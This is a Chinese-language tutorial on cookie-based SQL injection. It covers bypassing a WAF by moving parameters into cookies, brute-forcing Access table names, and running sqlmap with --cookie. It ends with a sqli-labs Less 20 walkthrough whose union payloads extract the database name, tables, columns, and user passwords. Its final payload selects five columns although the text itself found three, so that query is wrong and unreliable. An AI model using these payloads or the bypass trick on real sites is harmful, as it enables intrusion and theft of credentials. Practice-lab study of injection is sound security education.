文章目录
Cookie注入简介
Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登录管理员账号
Cookie与注入有什么关系
在动态脚本语言中存在超全局变量可以获取多种传参方式(基本上)
很多时候开发在开发的时候为了考虑到多种接受传参,在接受传参的时候都是用多种解释传参的方式
例如:
php中的 $_request[]可以获取POST|GET|COOKIE传参
注意:PHP5.4以上版本就不会接受Cookie传参了
如果说开发用了$_request[]来解释参数,然后我们的POST和GET传参被WAF拦截了,那么也许WAF没有对Cookie进行检测,我们尝试用Cookie进行传参,有可能会达到绕过的目的。
如何设置Cookie
用Javascript设置,打开F12开发者工具,选择Console,输入Js的语句就可以了
document.cookie="id="+escape("1")
通过浏览器Document.Cookie来设置Cookie
Cookie名字为id escape是一个编码函数,这个函数会进行一次url编码
accessMySQL_31">access数据库与MySQL数据库的区别
access数据库没有系统自带表,而且access数据库只有一个数据库,不用纠结库名,那怎么获取access数据库的表名和字段名呢,只有一个方法就是爆破
注意点:COOKIE注入的时候一定要把GET类型的传参删除,不然优先执行GET类型传参
union select 1,2,3,4,5,6,7,8,9,10 from admin
问:如果不知道库名怎么办?
答:就一个库,没必要知道
问:如果不知道表名怎么办?
答:只能靠爆破,and exists(select * from xxx) 如果页面正常就是存在这个XXX表 exists这个函数就是检查子查询能否查询到数据,如果能会返回一个True
问:sqlmap如何跑Cookie注入
答:sqlmap.py -u 'http://xx.xx.xx.xx:8080/xxx.asp' --cookie "id=123" --level 2
靶场 sqli-labs less 20
这一关的注入方式是cookie注入,所有语句与之前一样
判断是否存在注入
测试以下语句,发现存在单引号闭合,存在cookie注入漏洞
admin and 1=1
admin and 1=2
admin or 1=1
admin' and 1=1 --+
判断字段数
发现字段数为3
admin ' order by 3 --+
判断显错位
-1' union select 1,2,3 --+
判断数据库名
-1' union select 1,2,database() --+
判断表名
-1' union select 1,2,table_name from information_schema.tables where table_schema='security' limit 3,1 --+
判断字段名
-1' union select 1,2,column_name from information_schema.columns where table_schema='security' and table_name='users' --+
获取具体数据
-1' union select 1,2,id,username,password from users --+
